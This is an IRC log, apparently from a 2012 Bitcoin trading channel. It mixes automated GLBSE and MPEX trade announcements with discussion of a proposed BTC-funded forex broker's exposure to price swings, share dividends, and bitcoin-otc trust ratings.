WHO PAYS? Sep 06 19:13:12 [GLBSE] [ASICMINER] 2 @ 0.122 = 0.244 BTC [+] Sep 06 19:13:44 [GLBSE] [OBSI.HRPT] 1 @ 0.1035 BTC [+] Sep 06 19:14:01 [GLBSE] [BITBOND] 2 @ 0.4 = 0.8 BTC [+] Sep 06 19:14:13 the bitcoin reserve will pay Sep 06 19:14:20 there is no fiat Sep 06 19:14:23 it is an extreme scenario btcmining Sep 06 19:15:05 Even if the change is smaller, there's a small loss... Sep 06 19:15:07 kako said before that they have twice the amount of btc hold as reserver if i'm right Sep 06 19:15:29 **Reserve Sep 06 19:15:40 first of all, i hold all deposits which are under my control and never converted to anything Sep 06 19:15:58 second of all there is a covering bank of twice the size of deposits size Sep 06 19:16:00 [MPEX] [S.MPOE] 7124 @ 0.00040102 = 2.8569 BTC [+] Sep 06 19:16:07 starting with 10k Sep 06 19:16:38 that's all fine, but there's no 10% gain on position = 10% gain in BTC in that equation Sep 06 19:16:53 Just 10% gain in fiat gives 10% gain in fiat Sep 06 19:17:02 you will get 10% more btc (your gain) Sep 06 19:17:06 no matter the usd btc value Sep 06 19:17:14 guaranteed Sep 06 19:17:21 Then BTC price fluctuation matters for you. Will you hedge? Sep 06 19:17:26 for the user it's ok Sep 06 19:17:45 Yes, for the user it is, I'm concerned about kako here Sep 06 19:18:02 i have been asked to be a part of that operation (dealing with btc stock etc) Sep 06 19:18:07 but i have delicled for now Sep 06 19:18:21 declined* Sep 06 19:18:49 well so why exactly do you associate your name with what seems a somewhat dubious proposition ? Sep 06 19:19:04 oh, so it's not really your project? Sep 06 19:19:21 im working together with an existing forex broker firm Sep 06 19:19:42 and will be in charge of btc clients Sep 06 19:20:14 and will help with bitcoin tech stuff Sep 06 19:20:44 will be fun Sep 06 19:20:48 to use btc for forex Sep 06 19:21:12 Ah... does that broker firms understand how wildly BTC price can vary? Sep 06 19:21:22 yes Sep 06 19:21:32 I'm assuming they'll assume the price fluctuation risk here Sep 06 19:21:36 mk, so let's see here. suppose i deposit 100 btc. at that time btc is 100 yen. i trade for yen, get 10k. a week later, btc is 50 yen. i trade back get 200 btc. now i withdraw. you pay me 200btc Sep 06 19:21:42 from where does the extra 100 btc come from ? Sep 06 19:22:20 get 10k of what? yen? Sep 06 19:22:24 yes. Sep 06 19:22:28 it is in btc Sep 06 19:22:40 dude. read what i said. Sep 06 19:22:46 mircea, I had that exact discussion over and over Sep 06 19:23:07 sorry Sep 06 19:23:10 ok, so what's the answer ? Sep 06 19:23:41 BTC/Fiat price magically doesn't matter Sep 06 19:24:13 Who eats the risk of fluctuation is unclear. Sep 06 19:24:24 well i guess this will need to be fleshed out more then. Sep 06 19:24:47 it come from the broker, dunno if he hedge your trade in some way Sep 06 19:25:05 if the broker hedge, it's fine Sep 06 19:25:08 have no info on how it manage internally these orders Sep 06 19:25:15 It should just be cleared up upfront Sep 06 19:25:15 17:43.51 ( Enky ) i earn 3% with eur usd, i earn 3% on my bitcoin balance Sep 06 19:25:15 17:44.33 ( Enky ) or 30% with 10 to 1 leverage Sep 06 19:25:21 this sums it up doesnt it? Sep 06 19:25:27 it's direct Sep 06 19:25:30 Yes, for the customer Sep 06 19:25:35 not for the broker Sep 06 19:25:45 you earn 80% with a 0.1 lots (100 btc) you earn 80 btc Sep 06 19:25:47 [GLBSE] [BDK.BND] 11 @ 0.10075 = 1.1083 BTC [+] Sep 06 19:25:48 BTC/fiat price will impact the broker Sep 06 19:25:49 [GLBSE] [BDK.BND] 25 @ 0.1 = 2.5 BTC [-] Sep 06 19:25:52 [GLBSE] [BTC-BOND] 400 @ 0.00999999 = 4 BTC [+] Sep 06 19:26:34 probably they are big enough to take that risk, considering that at the begining there will be few users that will trade with bitcoins Sep 06 19:26:46 compared to the rest of their customers Sep 06 19:27:00 [MPEX] [B.MPCD.A] 24864 @ 0.00100545 = 24.9995 BTC [+] Sep 06 19:27:27 BTC/fiat price will impact the broker, simply because the % profit is in fiat, and he pays the same % in bitcoin, regardless of if bitcoin has gone up or down in value vs fiat Sep 06 19:28:09 BTC/fiat price does matter a lot for the broker, especially if you go with high leverage like 1:1000 Sep 06 19:28:31 maybe they do that for advertising,to gain new users, and so they accepted to take that risk for marketing purpose, who knows... Sep 06 19:29:04 they can reduce the leverage in any case, we are talking of small potatoes here, few users with bitcoin when they have maybe 100k users Sep 06 19:29:10 Well I guess it's up to kako to see how that will be worked out. Sep 06 19:29:19 yeah Sep 06 19:29:23 i'm just speculating Sep 06 19:29:26 [GLBSE] [FDBF] 2 @ 0.15 = 0.3 BTC [+] Sep 06 19:30:29 [MPEX] [S.MPOE] 9576 @ 0.00040102 = 3.8402 BTC [+] Sep 06 19:30:29 [MPEX] [S.MPOE] 4064 @ 0.00040105 = 1.6299 BTC [+] Sep 06 19:30:32 The thing is, his contact was talking about 1:1000 leverage being possible. I doubt they'd take so much risk as a broker Sep 06 19:30:45 with 1k btc i could do 10mn usd ? Sep 06 19:30:46 Especially with bitcoin's wild swings Sep 06 19:30:54 100 btc for 0.1 lot Sep 06 19:30:54 1 million* Sep 06 19:31:03 1000 usd for 0.1 lot, low leverage Sep 06 19:31:08 well 1k btc = 10k usd * 1000:1 = 10mn Sep 06 19:31:11 sorry, right Sep 06 19:31:21 [GLBSE] [BDT] 1 @ 1.06 BTC [+] Sep 06 19:31:34 i know plenty of people with 1k btc to play with Sep 06 19:31:41 so 1 lot Sep 06 19:31:42 i doubt therer's anyone with 10mn to dick around with. Sep 06 19:32:11 [GLBSE] [OBSI.HRPT] 1 @ 0.1035 BTC [+] Sep 06 19:32:27 [GLBSE] [MPOE.ETF] 2 @ 1.35 = 2.7 BTC [-] Sep 06 19:33:02 more's the point : Sep 06 19:33:03 ;;ticker Sep 06 19:33:04 Best bid: 10.86553, Best ask: 10.887, Bid-ask spread: 0.02147, Last trade: 10.86553, 24 hour volume: 87642, 24 hour low: 10.43399, 24 hour high: 11.17 Sep 06 19:33:15 ;;sell 87642 Sep 06 19:33:16 (sell [at|@] []) -- Logs a sell order for units of per unit, in units of . Use the optional field to put in any special notes. may include an arithmetical expression, and {mtgox(ask|bid|last)} to index price to mtgox ask, bid, or last price. May also include (1 more message) Sep 06 19:33:32 meh what was the command ? to sell 85k ? Sep 06 19:34:08 Yeah, problem with that leverage of 1:1000 is, imagine guy with 1000 BTC going that way for 10 million USD and his position loses 0.05% (5k USD). x1000 for leverage, 50% loss. Sep 06 19:34:31 yes Sep 06 19:34:42 But broker only demands 50% of BTC used for that, so 500 BTC loss. But BTC went to 1 USD each during the position. Sep 06 19:34:44 BTC-Mining that's not the problem Sep 06 19:34:53 the problem is i put 1k btc into that market, for 10mn Sep 06 19:34:57 then i dump 99k btc on the market Sep 06 19:35:09 Broker now has 500 USD for a 5000 USD loss Sep 06 19:35:14 then i've made a 300% price decrease and that means a 300`000% gain on my position Sep 06 19:35:32 [GLBSE] [ASICMINER] 60 @ 0.122 = 7.32 BTC [+] Sep 06 19:35:33 so i take home 300`000 btc for this. Sep 06 19:35:48 mircea, you're not trading ANY position containing BTC whatsoever. Sep 06 19:35:57 o wait Sep 06 19:36:00 what ?! Sep 06 19:36:03 Strictly fiat1/fiat2 positions Sep 06 19:36:10 o Sep 06 19:36:17 [GLBSE] [ASICMINER] 10 @ 0.122 = 1.22 BTC [+] Sep 06 19:36:20 hahaha so then what's the big deal, broker/whoever buys options Sep 06 19:36:36 or just spotsells. Sep 06 19:36:38 or etc. Sep 06 19:36:55 i thought the idea was to do btc/fiat forex. Sep 06 19:37:05 no Sep 06 19:37:17 but i dont know long term plan of that broker Sep 06 19:37:21 Yes, but Kako doesn't seem like he's going to hedge and says a 10% gain/loss on position = a 10% gain/loss on BTC Sep 06 19:37:34 [GLBSE] [OBSI.HRPT] 135 @ 0.1035 = 13.9725 BTC [+] Sep 06 19:37:50 Somehow BTC/fiat value has no impact in all this Sep 06 19:37:51 [MPEX] [S.MPOE] 10431 @ 0.00040105 = 4.1834 BTC [+] Sep 06 19:37:51 well im sure you get your btc at then prevailing rates. Sep 06 19:37:52 [MPEX] [S.MPOE] 13369 @ 0.00040212 = 5.3759 BTC [+] Sep 06 19:38:05 as in, you go in with 100 btc, buy fiatx, sell fiaty etc Sep 06 19:38:14 then at the end you go back into btc, at then prevailing rates. Sep 06 19:38:29 what? Sep 06 19:38:32 No, 10% gain on a USD/EUR position, 10% gain in BTC, guaranteed. Sep 06 19:38:39 But no hedging from broker Sep 06 19:38:42 no conversion to fiat Sep 06 19:38:44 at any time Sep 06 19:38:52 ok im confused. Sep 06 19:39:01 It doesn't work kako, that's not how Forex works O.o Sep 06 19:39:02 jesus. Sep 06 19:39:07 lol Sep 06 19:39:15 is there a faq or anything anywhere ? Sep 06 19:39:26 cause this he said she said thing doesn't help me. Sep 06 19:40:01 kako, can you confirm Sep 06 19:40:08 10% gain on a USD/EUR position, 10% gain in BTC, guaranteed. Sep 06 19:40:15 plus leverage Sep 06 19:40:15 yes Sep 06 19:40:17 yes Sep 06 19:40:30 and will the broker hedge against BTC/fiat fluctuations? Sep 06 19:40:32 look mp Sep 06 19:40:35 you put in 100 btc Sep 06 19:40:43 you can trade up to 0.1 lot of anything you like Sep 06 19:40:52 you make a short or whatever Sep 06 19:40:53 they have twice the amount of bitcoin held by customers, right kako? Sep 06 19:40:55 profit 10% Sep 06 19:41:04 your btc balance got 10% btc Sep 06 19:41:22 to back up the profits yes Sep 06 19:41:34 we're safe, as customers Sep 06 19:41:50 but i didn't make the 10% in btc. Sep 06 19:41:53 yes, but the broker isn't, and kako isn't answering about that Sep 06 19:41:54 i made it in w/e fiats. Sep 06 19:42:04 you made 10% of units Sep 06 19:42:05 isnt? depends Sep 06 19:42:09 [GLBSE] [HYDRO.BONDS] 1 @ 1.48 BTC [-] Sep 06 19:42:12 right. of units. which aren't btc. Sep 06 19:42:19 well they are. Sep 06 19:42:47 so if the units are btc then how come i buy fiat with them ? Sep 06 19:43:12 the size of the deposit limits the max trading amount allowed Sep 06 19:43:21 thats all Sep 06 19:43:34 you put in 100 btc Sep 06 19:43:37 That doesn't explain anything, it's completly unrelated Sep 06 19:43:41 now you can borrow and short 10k usd Sep 06 19:43:49 on mt Sep 06 19:43:50 or 0.1 lots Sep 06 19:43:50 so if in december btc/usd = 100, will 100 btc still buy me 0.1 lot ? Sep 06 19:43:59 yes Sep 06 19:44:03 no matter the price Sep 06 19:44:14 100 btc will be 0.1 lot limit Sep 06 19:44:38 can i short this lol Sep 06 19:44:58 if bitcoin go to 100 you have to change the limit Sep 06 19:45:13 that wont happen in near future Sep 06 19:45:13 100 btc or 100x100 10000 usd for 0.1 lots it's not attractive Sep 06 19:45:21 100k usd Sep 06 19:45:24 think about it kakobrekla : i send you 1k btc now, get 1 lot. Sep 06 19:45:25 then broker is highly at risk of BTC/fiat price fluctuations. We understand the customer part, just not what the broker will do to protect against wild BTC price fluctuations. Sep 06 19:45:43 that's 10k usd for 1 lot Sep 06 19:45:53 1 lot usually is 100k usd at forex Sep 06 19:45:56 in december i send you 1k btc for 1 lot, that's 100k usd for 1 lot ?! Sep 06 19:46:02 well i guess that the broker is 'long' on bitcoin Sep 06 19:46:12 he'd have to be, yea. Sep 06 19:46:24 yes Sep 06 19:46:32 just as long as he's aware of this. Sep 06 19:46:40 oh they are Sep 06 19:47:36 good. cause as i was saying, btc is very volatile and has in the past, even recent past, caused a lot of pain. Sep 06 19:47:51 mircea Sep 06 19:47:54 the dividend is in long format Sep 06 19:47:54 right? Sep 06 19:47:59 yep rg Sep 06 19:48:01 ok Sep 06 19:48:03 btw Sep 06 19:48:04 i have introduced bitcoin to them in january i think Sep 06 19:48:08 maybe december Sep 06 19:48:08 dont you think you should make deposit the long too Sep 06 19:48:12 or even earlier Sep 06 19:48:15 cause everything is long except deposit Sep 06 19:48:22 keep it uniform Sep 06 19:48:24 they have been following it closlely Sep 06 19:48:24 rg well that's because it allows anon depositing Sep 06 19:48:29 and then the digits are used to identify you Sep 06 19:48:40 oh Sep 06 19:48:41 i see Sep 06 19:48:42 that's not bad Sep 06 19:48:50 The problem is, even if he's long on bitcoin... suppose someone makes a gain in fiat position (10%). That gain is in fiat. During that time, BTC value indeed goes long, it raises 200%. Try to buy with 10% fiat profit 10% profit in bitcoins worth 3x the price. You'd need to have made 30% profit on the position to pay the 10% in bitcoins. Sep 06 19:48:57 yeah. in fact multiple people can deposit from same address (and they have, mtgox, etc) Sep 06 19:49:25 Broker loses money. Sep 06 19:49:33 in other news : http://24.media.tumblr.com/tumblr_lalq9cqBFg1qc6pb2o1_400.gif a quickie is no reason for the girl not to go fully nude. Sep 06 19:49:48 i forget what my notional float is Sep 06 19:49:50 BTC-Mining, thats why there is this enourmeus suppy of coins in the bank Sep 06 19:49:50 that's my total shares right Sep 06 19:49:55 supply Sep 06 19:50:10 Yeah, but that's INCREDIBLY RISKY for the broker Sep 06 19:50:19 especially at 1:1000 leverage available Sep 06 19:50:29 if it is available Sep 06 19:50:30 i guess its more of a pocket change for them Sep 06 19:50:43 rg : pm Sep 06 19:50:48 Well if it's just a test for the heck of it... Sep 06 19:51:14 BTC-Mining i imagine it's something like that, get the ball rolling see what happens. Sep 06 19:51:17 when will be possible to test it kako? Sep 06 19:51:23 next month? Sep 06 19:51:47 if you can use your imagination to change eur profile to btc you can test it now Sep 06 19:52:01 i want to operate, no demo:) Sep 06 19:52:37 yes, that's the answer I was desperatly looking for. If the broker is aware of the risk/what he's going to do. Sep 06 19:52:57 Enky, wait till saso gets back online Sep 06 19:53:20 BTC/fiat price has a big impact on the broker unders the terms that it doesn't affect the customer Sep 06 19:53:22 [MPEX] [S.BVPS] [PAID] 500000 @ 0.00007 = 35 BTC Sep 06 19:53:36 Just wanted to know if that was clear with the broker. Sep 06 19:53:46 It is. Sep 06 19:53:48 yeeee Sep 06 19:54:41 i wish i had some god dman milk Sep 06 19:54:42 i might go get some Sep 06 19:54:44 Good, you never answered to that before. Arf, what an ordeal. Could have ended much earlier. Sep 06 19:54:47 dependinhg on how hot it is Sep 06 19:57:07 BTC-Mining: at least its over :) Sep 06 19:57:32 [GLBSE] [OBSI.HRPT] 8 @ 0.1041 = 0.8328 BTC [+] Sep 06 19:57:33 [GLBSE] [OBSI.HRPT] 57 @ 0.10428 = 5.944 BTC [+] Sep 06 19:58:23 aye, I really wasn't sure if there was a misunderstanding between you and your contact. Sep 06 19:58:42 [GLBSE] [NYAN.C] 20 @ 0.68 = 13.6 BTC [-] Sep 06 19:59:09 [GLBSE] [NYAN.C] 21 @ 0.68 = 14.28 BTC [-] Sep 06 19:59:11 [GLBSE] [NYAN.C] 100 @ 0.52 = 52 BTC [-] Sep 06 19:59:11 [GLBSE] [NYAN.C] 1 @ 0.5 BTC [-] Sep 06 20:00:14 eurozone stays .75 Sep 06 20:00:16 this is ridiculous Sep 06 20:00:24 what the fuck interest rates should be in the 3-5% Sep 06 20:00:38 im glad we had this discussion might help me write better faq Sep 06 20:00:44 ;> Sep 06 20:01:31 usually how it works. Sep 06 20:01:38 But when you insisted on the guaranteed % for the customer, I started asking about the impact for the broker instead, since there was supposed to be one. Sep 06 20:02:17 You never answered to that broker part... were you just no longer reading my examples by that point? >.> Sep 06 20:03:28 on how to protect against btc devaluation? Sep 06 20:03:29 they are long on bitcoin, and considering the broker, they have probably enough money to sustain prices at mtgox:)) Sep 06 20:03:38 if they would Sep 06 20:03:45 or price raise Sep 06 20:04:01 considering how small mtgox is Sep 06 20:04:33 if people make a loss, and BTC price drops at the same time, or people make gains while BTC price raises at the same time Sep 06 20:04:47 at any rate this is good by getting some more people involved in btc. Sep 06 20:05:15 yes indeed, would be good to ahve a forex platform <-> BTC Sep 06 20:05:47 this is good, maybe another broker do the same and bitcoin will spread in the financial community Sep 06 20:05:59 attracting new investors that buy bitcoins Sep 06 20:06:07 [MPEX] [S.MPOE] 21759 @ 0.00039922 = 8.6866 BTC [-] Sep 06 20:06:45 BTC-Mining if you think about it, as i can go right now into a forex platform with usd, whereas getting btc is complicated Sep 06 20:06:58 they would HAVE to offer seemingly unreasonably buttered deals to get into btc. Sep 06 20:07:44 apparently, there's some legal loopholes which would allow the BTC users to evade declaring forex profits at all... or something like that. Sep 06 20:08:04 indeed so. Sep 06 20:08:15 the legal loopholes are called "take your laws and shove them till you're satisfied" Sep 06 20:13:36 [MPEX] [F.GIGA.ETF] 2160 @ 0.00086667 = 1.872 BTC [+] Sep 06 20:13:38 [MPEX] [F.GIGA.ETF] 10046 @ 0.00086842 = 8.7241 BTC [+] Sep 06 20:13:39 [MPEX] [F.GIGA.ETF] 6800 @ 0.00086934 = 5.9115 BTC [+] Sep 06 20:13:40 [MPEX] [F.GIGA.ETF] 3175 @ 0.00087173 = 2.7677 BTC [+] Sep 06 20:13:48 [GLBSE] [OBSI.HRPT] 100 @ 0.10428 = 10.428 BTC [+] Sep 06 20:16:06 [GLBSE] [OBSI.HRPT] 91 @ 0.10428 = 9.4895 BTC [+] Sep 06 20:18:55 [GLBSE] [NYAN] 1 @ 0.99 BTC [-] Sep 06 20:20:42 the lender is the one giving the money... Sep 06 20:20:51 the lendee would be deposit takes Sep 06 20:21:14 although said lendees often then loaned those funds to others Sep 06 20:21:39 a lender cannot really be untrustworthy tho Sep 06 20:24:47 [MPEX] [F.GIGA.ETF] 1200 @ 0.00087173 = 1.0461 BTC [+] Sep 06 20:25:12 [GLBSE] [FPGAMINING] 5 @ 0.8099 = 4.0495 BTC [+] Sep 06 20:25:33 [GLBSE] [FPGAMINING] 4 @ 0.81 = 3.24 BTC [+] Sep 06 20:27:48 [MPEX] [F.GIGA.ETF] 200 @ 0.00085667 = 0.1713 BTC [-] Sep 06 20:27:49 [MPEX] [F.GIGA.ETF] 12017 @ 0.00085573 = 10.2833 BTC [-] Sep 06 20:31:15 [GLBSE] [HYDRO.BONDS] 1 @ 1.48 BTC [-] Sep 06 20:40:46 [GLBSE] [HYDRO.BONDS] 1 @ 1.48 BTC [-] Sep 06 20:41:30 [GLBSE] [FDBF] 56 @ 0.15 = 8.4 BTC [+] Sep 06 20:42:05 [MPEX] [S.MPOE] 5000 @ 0.0004 = 2 BTC [+] Sep 06 20:42:07 [MPEX] [S.MPOE] 6100 @ 0.00039922 = 2.4352 BTC [-] Sep 06 20:42:38 [MPEX] [F.GIGA.ETF] 9600 @ 0.00084917 = 8.152 BTC [-] Sep 06 20:48:58 [MPEX] [S.MPOE] 19500 @ 0.00039922 = 7.7848 BTC [-] Sep 06 20:58:56 786.15699996 BTC on 06-09-12 Sep 06 20:59:02 holy shit s.dice paid dividends ?! Sep 06 20:59:20 You're late on the question Sep 06 20:59:26 i just noticed Sep 06 21:00:47 [MPEX] [O.BTCUSD.P100T] 2 @ 0.11934398 = 0.2387 BTC [-] Sep 06 21:00:48 [MPEX] [O.BTCUSD.P100T] 1 @ 0.11933215 BTC [-] Sep 06 21:02:35 when is the bet due Sep 06 21:03:06 [MPEX] [S.DICE] 100000 @ 0.0034 = 340 BTC [+] Sep 06 21:03:19 which bet ? Sep 06 21:04:06 GSDPT has paid their investors the divdidend :) Sep 06 21:04:38 The reason why there were no ask wall as was due to that me and Erik were a bit off sync so to make it fair I took down the bid wall until I could pay the dividend. Sep 06 21:05:16 i thought it sold out ? Sep 06 21:05:28 or you mean, the buy side ? Sep 06 21:06:30 No I meant like I couldn't offer any shares until the dividend had been paid out otherwise it would have gotten diluted. Sep 06 21:06:41 ah yes. Sep 06 21:06:47 what was the bet about? Sep 06 21:06:48 [GLBSE] [NYAN.B] 10 @ 1 = 10 BTC [+] Sep 06 21:06:51 I wanted to bet dammit xD Sep 06 21:06:56 I would have bet a lot on Erik Sep 06 21:07:09 on erik you bet by buying his shares lol Sep 06 21:08:06 Well I could have bet on him twice xD Sep 06 21:08:16 my pass through isn't much risk as I will only pay if Erik pays :P Sep 06 21:09:24 i like the mkt depth on mpex so far, like 700btc worth ? Sep 06 21:09:54 [GLBSE] [HYDRO.BONDS] 2 @ 1.48 = 2.96 BTC [-] Sep 06 21:11:01 [GLBSE] [OBSI.HRPT] 1 @ 0.10428 BTC [+] Sep 06 21:11:14 [MPEX] [F.GIGA.ETF] 4566 @ 0.00085011 = 3.8816 BTC [+] Sep 06 21:12:35 [GLBSE] [FDBF] 3 @ 0.15 = 0.45 BTC [+] Sep 06 21:13:41 !ticker s.dice Sep 06 21:13:43 [MPEX:S.DICE] 1day: 0.0034 / 0.0034 / 0.0034 (100165 shares, 340.56 BTC), 30day: 0.0032 / 0.00327629 / 0.0034 (3637679 shares, 11,918.11 BTC) Sep 06 21:13:46 [GLBSE] [BDT] 10 @ 1.035 = 10.35 BTC [-] Sep 06 21:14:13 [GLBSE] [BDT] 1 @ 1.03 BTC [-] Sep 06 21:14:14 [GLBSE] [BDT] 1 @ 1.02 BTC [-] Sep 06 21:17:48 [GLBSE] [OBSI.HRPT] 7 @ 0.10428 = 0.73 BTC [+] Sep 06 21:19:04 [GLBSE] [BITBOND] 1 @ 0.4 BTC [+] Sep 06 21:19:12 what's the news on the shtylman case btw ? Sep 06 21:19:18 ;;bc,stats Sep 06 21:19:20 Current Blocks: 197568 | Current Difficulty: 2694047.952955 | Next Difficulty At Block: 199583 | Next Difficulty In: 2015 blocks | Next Difficulty In About: 7 hours, 16 minutes, and 35 seconds | Next Difficulty Estimate: 10776191.81182005 | Estimated Percent Change: 300 Sep 06 21:20:12 heh Sep 06 21:20:13 http://i.imgur.com/s4IKe.png Sep 06 21:20:15 [GLBSE] [TYGRR.BOND-P] 10 @ 0.08999 = 0.8999 BTC [+] Sep 06 21:20:17 this is pretty good. Sep 06 21:20:49 [GLBSE] [GOLD] 10 @ 0.00989 = 0.0989 BTC [+] Sep 06 21:26:38 [MPEX] [S.MPOE] 17029 @ 0.00040212 = 6.8477 BTC [+] Sep 06 21:34:54 [GLBSE] [GMVT-BOT] 1 @ 0.168 BTC [+] Sep 06 21:35:55 [GLBSE] [FPGA.CONTRACT] 1 @ 0.074989 BTC [+] Sep 06 21:36:22 [GLBSE] [DI.BFLSC.FAIL] 30 @ 0.001 = 0.03 BTC [+] Sep 06 21:39:22 [MPEX] [S.DICE] 134700 @ 0.003325 = 447.8775 BTC [-] Sep 06 21:46:01 [MPEX] [S.BVPS] 250 @ 0.00358446 = 0.8961 BTC [-] Sep 06 21:46:02 [MPEX] [S.BVPS] 500 @ 0.00352902 = 1.7645 BTC [-] Sep 06 21:46:03 [MPEX] [S.BVPS] 450 @ 0.00352306 = 1.5854 BTC [-] Sep 06 21:46:04 [MPEX] [S.BVPS] 34 @ 0.00349912 = 0.119 BTC [-] Sep 06 21:46:05 [MPEX] [S.BVPS] 147 @ 0.003456 = 0.508 BTC [-] Sep 06 21:46:06 [MPEX] [S.BVPS] 417 @ 0.0033891 = 1.4133 BTC [-] Sep 06 21:46:38 [MPEX] [F.GIGA.ETF] 6625 @ 0.00087173 = 5.7752 BTC [+] Sep 06 21:46:39 [MPEX] [F.GIGA.ETF] 2392 @ 0.00087312 = 2.0885 BTC [+] Sep 06 21:55:04 [GLBSE] [BIB.PIRATE] 25 @ 0.089 = 2.225 BTC [-] Sep 06 21:55:05 [MPEX] [S.BVPS] 1202 @ 0.003385 = 4.0688 BTC [-] Sep 06 21:55:05 [GLBSE] [BIB.PIRATE] 3 @ 0.09 = 0.27 BTC [+] Sep 06 21:55:21 [MPEX] [S.BVPS] 70 @ 0.00359095 = 0.2514 BTC [+] Sep 06 21:55:36 [MPEX] [S.BVPS] 450 @ 0.00366612 = 1.6498 BTC [+] Sep 06 21:56:00 [GLBSE] [BIB.PIRATE] 17 @ 0.09 = 1.53 BTC [+] Sep 06 21:56:01 [GLBSE] [BIB.PIRATE] 33 @ 0.095 = 3.135 BTC [+] Sep 06 21:56:13 [GLBSE] [BIB.BVPS] 2 @ 0.00445 = 0.0089 BTC [-] Sep 06 21:57:21 usagi: Sep 06 21:57:23 [GLBSE] [BIB.PIRATE] 17 @ 0.095 = 1.615 BTC [+] Sep 06 21:57:24 i think i speak for all men when i say Sep 06 21:57:26 you're banned Sep 06 22:02:35 [GLBSE] [BDT] 2 @ 1.02 = 2.04 BTC [-] Sep 06 22:06:21 [GLBSE] [NYAN.C] 1 @ 0.7 BTC [+] Sep 06 22:08:14 [GLBSE] [BIB.PIRATE] 33 @ 0.1 = 3.3 BTC [+] Sep 06 22:08:44 [MPEX] [S.MPOE] 41300 @ 0.00039996 = 16.5183 BTC [-] Sep 06 22:10:43 rg: my domain is up for renewal, is there any place you recomend for domain management? Sep 06 22:13:11 namecheap Sep 06 22:13:26 ZT has a service for that :) Sep 06 22:13:41 [GLBSE] [ASICMINER] 29 @ 0.122 = 3.538 BTC [+] Sep 06 22:13:43 [GLBSE] [PPT.E] 20 @ 0.3200001 = 6.4 BTC [+] Sep 06 22:13:44 [GLBSE] [PUREMINING] 3 @ 0.0949 = 0.2847 BTC [+] Sep 06 22:14:42 i think i speak for all men when i say you're banned << well... i'm ignoring it at any rate. Sep 06 22:16:41 http://bitcoin-otc.com/viewratingdetail.php?nick=pirateat40&sign=ANY&type=RECV daily installment of pirate wot saga. today down to 103 Sep 06 22:22:33 [GLBSE] [MPOE.ETF] 4 @ 1.35 = 5.4 BTC [-] Sep 06 22:23:25 [GLBSE] [NYAN] 1 @ 0.99 BTC [-] Sep 06 22:23:49 mircea_popescu too bad we didnt chart it Sep 06 22:24:14 ya lol Sep 06 22:24:27 what did he have at the peak, 270 ? Sep 06 22:24:39 i guess Sep 06 22:25:28 hm Sep 06 22:25:31 270k btc? Sep 06 22:25:32 now thats a weeked project Sep 06 22:25:37 weekend Sep 06 22:25:57 chart errything historicaly from the irc chan log that streams otc ratings Sep 06 22:26:07 i think its #bitcoin-otc-ratings Sep 06 22:26:08 [MPEX] [F.GIGA.ETF] 7708 @ 0.00087312 = 6.73 BTC [+] Sep 06 22:26:09 [MPEX] [F.GIGA.ETF] 12192 @ 0.00087369 = 10.652 BTC [+] Sep 06 22:26:19 what r u talking about kako? Sep 06 22:26:46 about charting OTC ratings historically Sep 06 22:26:51 !getrating kakobrekla Sep 06 22:26:57 ;;getrating kakobrekla Sep 06 22:26:58 Currently authenticated from hostmask kakobrekla!~T42@89-212-41-49.static.t-2.net . User kakobrekla, rated since Fri May 13 15:50:53 2011. Cumulative rating 82, from 46 total ratings. Received ratings: 46 positive, 0 negative. Sent ratings: 48 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=kakobrekla Sep 06 22:26:59 this Sep 06 22:27:27 [GLBSE] [ABM] 3 @ 0.1 = 0.3 BTC [-] Sep 06 22:27:28 i've to add some negative feedback:) Sep 06 22:27:33 :D Sep 06 22:28:22 [GLBSE] [OBSI.HRPT] 1 @ 0.10427 BTC [-] Sep 06 22:28:29 this comment is the best: "very good guy and good girlfriend, a must see" Sep 06 22:28:52 lol Sep 06 22:30:09 Enky no, 270 trust points. you know what the wot is ? Sep 06 22:30:21 kakobrekla that really is a good ideea. Sep 06 22:30:26 perhaps Sep 06 22:30:31 what sarajoolz does is nice, but historical thing would be helpful. Sep 06 22:30:33 2 yrs ago kako explained it to mee, i forgot Sep 06 22:31:00 aite. Sep 06 22:31:12 trust points for over the count btc transaction i guess Sep 06 22:31:26 smth like that ya Sep 06 22:32:05 [MPEX] [S.MPOE] 13253 @ 0.00040127 = 5.318 BTC [+] Sep 06 22:32:06 [MPEX] [S.MPOE] 9012 @ 0.00039922 = 3.5978 BTC [-] Sep 06 22:33:06 ;;getrating JWU42 Sep 06 22:33:06 Currently authenticated from hostmask JWU42!~JW@unaffiliated/subpar . User JWU42, rated since Thu Mar 24 19:21:43 2011. Cumulative rating 66, from 31 total ratings. Received ratings: 31 positive, 0 negative. Sent ratings: 29 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=JWU42 Sep 06 22:33:20 hmm - never got close to 100 Sep 06 22:33:29 a negative - WTF Sep 06 22:33:31 hmm Sep 06 22:33:52 ahh Sep 06 22:34:04 sent negative - for Mr. P Sep 06 22:35:04 lol Sep 06 22:37:08 [MPEX] [S.DICE] 1000 @ 0.00335 = 3.35 BTC [+] Sep 06 22:37:09 [MPEX] [S.DICE] 3500 @ 0.003385 = 11.8475 BTC [+] Sep 06 22:37:11 [MPEX] [S.DICE] 5500 @ 0.0034 = 18.7 BTC [+] Sep 06 22:40:56 [MPEX] [O.BTCUSD.C010T] 840 @ 0.9107277 = 765.0113 BTC [+] Sep 06 22:41:54 [MPEX] [B.MPCD.A] 10000 @ 0.00100554 = 10.0554 BTC [+] Sep 06 22:42:01 [MPEX] [B.MPCD.B] 15000 @ 0.00100831 = 15.1247 BTC [+] Sep 06 22:42:10 [MPEX] [B.MPCD.C] 25000 @ 0.00102545 = 25.6363 BTC [+] Sep 06 22:47:22 [MPEX] [F.GIGA.ETF] 12134 @ 0.0008624 = 10.4644 BTC [-] Sep 06 22:47:23 [MPEX] [F.GIGA.ETF] 8000 @ 0.00084917 = 6.7934 BTC [-] Sep 06 22:47:25 [MPEX] [F.GIGA.ETF] 15200 @ 0.00084525 = 12.8478 BTC [-] Sep 06 22:47:26 [MPEX] [F.GIGA.ETF] 6553 @ 0.00084496 = 5.537 BTC [-] Sep 06 22:47:27 [MPEX] [F.GIGA.ETF] 23600 @ 0.00083489 = 19.7034 BTC [-] Sep 06 22:47:28 [MPEX] [F.GIGA.ETF] 12888 @ 0.00082673 = 10.6549 BTC [-] Sep 06 22:47:28 [MPEX] [F.GIGA.ETF] 2700 @ 0.00082516 = 2.2279 BTC [-] Sep 06 22:47:30 [MPEX] [F.GIGA.ETF] 2300 @ 0.00081842 = 1.8824 BTC [-] Sep 06 22:47:31 [MPEX] [F.GIGA.ETF] 13300 @ 0.00081575 = 10.8495 BTC [-] Sep 